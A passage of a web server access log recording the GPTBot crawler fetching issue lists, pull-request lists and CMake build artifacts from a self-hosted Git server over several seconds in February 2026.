3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:18:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11278] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv" -[17/Feb/2026:18:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 17084] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:18:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags.rss" [Client 74.7.227.38] [Length 347] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/tags" -[17/Feb/2026:18:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9912] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:18:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:18:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake" [Client 74.7.227.38] [Length 55553] [Gzip 12.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:18:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16068] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15127] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16065] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11327] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 